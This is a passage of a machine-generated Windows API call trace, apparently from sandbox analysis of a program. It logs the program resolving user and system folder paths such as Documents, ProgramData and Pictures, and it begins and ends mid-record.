(in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0121.163] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.163] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\") returned 1 [0121.163] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0121.163] SetLastError (dwErrCode=0x0) [0121.163] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0121.163] GetLastError () returned 0x0 [0121.164] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f65c, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce8fe4, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1130000, nFileSizeHigh=0x40, nFileSizeLow=0x11468c8, dwReserved0=0x28f524, dwReserved1=0x3e, cFileName="돴Ĕ塚(P", cAlternateFileName="榬Ĕ検Ĕ2")) returned 0xffffffff [0121.164] GetLastError () returned 0x2 [0121.164] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\") returned 1 [0121.164] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1") returned 1 [0121.164] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28efb0*="KEECFM~1") returned 0x11 [0121.165] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0121.165] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0121.165] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.165] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1ac*="C:\\Users\\") returned 1 [0121.165] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0121.165] SetLastError (dwErrCode=0x0) [0121.165] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0121.168] GetLastError () returned 0x0 [0121.168] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce8fe4, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1130000, nFileSizeHigh=0x40, nFileSizeLow=0x1146880, dwReserved0=0x28f26c, dwReserved1=0x32, cFileName="榬Ĕ(@", cAlternateFileName="뗴Ĕ뚜Ĕ\"")) returned 0xffffffff [0121.169] GetLastError () returned 0x2 [0121.169] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1ec*="C:\\Users\\") returned 1 [0121.169] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f474*="C:\\Users") returned 1 [0121.169] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users", lpFilePart=0x28ecf8*="Users") returned 0x8 [0121.170] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0121.170] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0121.170] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.170] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef4*="C:\\") returned 1 [0121.170] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.170] SetLastError (dwErrCode=0x0) [0121.170] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0121.170] GetLastError () returned 0x0 [0121.170] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0x114c030 [0121.171] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0121.171] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0121.171] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.171] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f474*="C:\\Users") returned 1 [0121.171] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28f1e4*="C:\\Users") returned 1 [0121.172] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f474*="C:\\Users\\") returned 1 [0121.172] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f26c, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114c030 [0121.172] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0121.172] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0121.172] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.173] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj") returned 1 [0121.173] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj") returned 1 [0121.173] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\") returned 1 [0121.173] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0x114c030 [0121.173] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0121.174] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0121.174] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.174] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0121.174] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0121.175] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0121.175] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x114c030 [0121.175] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0121.175] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0121.175] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.176] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0121.176] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0121.176] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0121.176] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x114c030 [0121.176] FileTimeToLocalFileTime (in: lpFileTime=0x28fa54, lpLocalFileTime=0x28f9d0 | out: lpLocalFileTime=0x28f9d0) returned 1 [0121.177] FileTimeToDosDateTime (in: lpFileTime=0x28f9d0, lpFatDate=0x28fa22, lpFatTime=0x28fa20 | out: lpFatDate=0x28fa22, lpFatTime=0x28fa20) returned 1 [0121.177] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.177] SysReAllocStringLen (in: pbstr=0x28fcdc*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fcdc*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0121.177] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fda0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0121.178] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0121.178] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", cchLength=0x26 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 0x26 [0121.178] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda0*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.178] SysReAllocStringLen (in: pbstr=0x33325bc*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x33325bc*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.178] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents") returned 0x0 [0121.186] SysReAllocStringLen (in: pbstr=0x28fd90*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fd90*="C:\\Users\\kEecfMwgj\\Documents") returned 1 [0121.186] SysReAllocStringLen (in: pbstr=0x28fd94*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0121.186] GetThreadLocale () returned 0x409 [0121.186] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.186] GetThreadLocale () returned 0x409 [0121.186] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.186] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\", lpFilePart=0x28fa90*=0x0) returned 0x1d [0121.186] SysReAllocStringLen (in: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\", psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0121.187] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0121.187] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Documents\\", cchLength=0x1d | out: lpsz="c:\\users\\keecfmwgj\\documents\\") returned 0x1d [0121.187] SysReAllocStringLen (in: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\", psz="c:\\users\\keecfmwgj\\documents\\", len=0x1d | out: pbstr=0x28fd94*="c:\\users\\keecfmwgj\\documents\\") returned 1 [0121.187] SysReAllocStringLen (in: pbstr=0x33325ac*=0x0, psz="c:\\users\\keecfmwgj\\documents\\", len=0x1d | out: pbstr=0x33325ac*="c:\\users\\keecfmwgj\\documents\\") returned 1 [0121.187] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0121.189] SysReAllocStringLen (in: pbstr=0x28fd84*=0x0, psz="C:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fd84*="C:\\Users\\Public\\Documents") returned 1 [0121.190] SysReAllocStringLen (in: pbstr=0x28fd88*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\") returned 1 [0121.190] GetThreadLocale () returned 0x409 [0121.190] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.190] GetThreadLocale () returned 0x409 [0121.190] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.190] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x28fa90*=0x0) returned 0x1a [0121.190] SysReAllocStringLen (in: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\", psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\") returned 1 [0121.190] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fcc0*="C:\\Users\\Public\\Documents\\") returned 1 [0121.190] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\", cchLength=0x1a | out: lpsz="c:\\users\\public\\documents\\") returned 0x1a [0121.190] SysReAllocStringLen (in: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\", psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x28fd88*="c:\\users\\public\\documents\\") returned 1 [0121.191] SysReAllocStringLen (in: pbstr=0x33325c0*=0x0, psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x33325c0*="c:\\users\\public\\documents\\") returned 1 [0121.191] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0121.194] SysReAllocStringLen (in: pbstr=0x28fd78*=0x0, psz="C:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fd78*="C:\\Program Files (x86)") returned 1 [0121.194] SysReAllocStringLen (in: pbstr=0x28fd7c*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="C:\\Program Files (x86)\\") returned 1 [0121.194] GetThreadLocale () returned 0x409 [0121.194] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.194] GetThreadLocale () returned 0x409 [0121.194] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.194] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x28fa90*=0x0) returned 0x17 [0121.194] SysReAllocStringLen (in: pbstr=0x28fd7c*="C:\\Program Files (x86)\\", psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="C:\\Program Files (x86)\\") returned 1 [0121.195] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fcc0*="C:\\Program Files (x86)\\") returned 1 [0121.195] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\", cchLength=0x17 | out: lpsz="c:\\program files (x86)\\") returned 0x17 [0121.195] SysReAllocStringLen (in: pbstr=0x28fd7c*="C:\\Program Files (x86)\\", psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="c:\\program files (x86)\\") returned 1 [0121.195] SysReAllocStringLen (in: pbstr=0x33325c4*=0x0, psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x33325c4*="c:\\program files (x86)\\") returned 1 [0121.195] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\ProgramData") returned 0x0 [0121.205] SysReAllocStringLen (in: pbstr=0x28fd6c*=0x0, psz="C:\\ProgramData", len=0xe | out: pbstr=0x28fd6c*="C:\\ProgramData") returned 1 [0121.205] SysReAllocStringLen (in: pbstr=0x28fd70*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fd70*="C:\\ProgramData\\") returned 1 [0121.205] GetThreadLocale () returned 0x409 [0121.205] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.205] GetThreadLocale () returned 0x409 [0121.205] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.205] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x28fa90*=0x0) returned 0xf [0121.205] SysReAllocStringLen (in: pbstr=0x28fd70*="C:\\ProgramData\\", psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fd70*="C:\\ProgramData\\") returned 1 [0121.205] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fcc0*="C:\\ProgramData\\") returned 1 [0121.206] CharLowerBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="c:\\programdata\\") returned 0xf [0121.206] SysReAllocStringLen (in: pbstr=0x28fd70*="C:\\ProgramData\\", psz="c:\\programdata\\", len=0xf | out: pbstr=0x28fd70*="c:\\programdata\\") returned 1 [0121.206] SysReAllocStringLen (in: pbstr=0x33325c8*=0x0, psz="c:\\programdata\\", len=0xf | out: pbstr=0x33325c8*="c:\\programdata\\") returned 1 [0121.206] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0121.209] SysReAllocStringLen (in: pbstr=0x28fd60*=0x0, psz="C:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fd60*="C:\\Program Files (x86)\\Common Files") returned 1 [0121.209] SysReAllocStringLen (in: pbstr=0x28fd64*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0121.209] GetThreadLocale () returned 0x409 [0121.209] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.209] GetThreadLocale () returned 0x409 [0121.210] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.210] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x28fa90*=0x0) returned 0x24 [0121.210] SysReAllocStringLen (in: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\", psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0121.210] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fcc0*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0121.210] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files\\", cchLength=0x24 | out: lpsz="c:\\program files (x86)\\common files\\") returned 0x24 [0121.210] SysReAllocStringLen (in: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\", psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x28fd64*="c:\\program files (x86)\\common files\\") returned 1 [0121.210] SysReAllocStringLen (in: pbstr=0x33325cc*=0x0, psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x33325cc*="c:\\program files (x86)\\common files\\") returned 1 [0121.210] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\Users\\kEecfMwgj\\Pictures") returned 0x0 [0121.214] SysReAllocStringLen (in: pbstr=0x28fd54*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fd54*="C:\\Users\\kEecfMwgj\\Pictures") returned 1 [0121.215] SysReAllocStringLen (in: pbstr=0x28fd58*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0121.215] GetThreadLocale () returned 0x409 [0121.215] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Pictures\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.215] GetThreadLocale () returned 0x409 [0121.215] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Pictures\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.215] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\", lpFilePart=0x28fa90*=0x0) returned 0x1c [0121.215] SysReAllocStringLen (in: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\", psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0121.215] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0121.215] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Pictures\\", cchLength=0x1c | out: lpsz="c:\\users\\keecfmwgj\\pictures\\") returned 0x1c [0121.215] SysReAllocStringLen (in: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\", psz="c:\\users\\keecfmwgj\\pictures\\", len=0x1c | out: pbstr=0x28fd58*="c:\\users\\keecfmwgj\\pictures\\") returned 1 [0121.215] SysReAllocStringLen (in: pbstr=0x33325d0*=0x0, psz="c:\\users\\keecfmwgj\\pictures\\", len=0x1c | out: pbstr=0x33325d0*="c:\\users\\keecfmwgj\\pictures\\") returned 1 [0121.215] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, 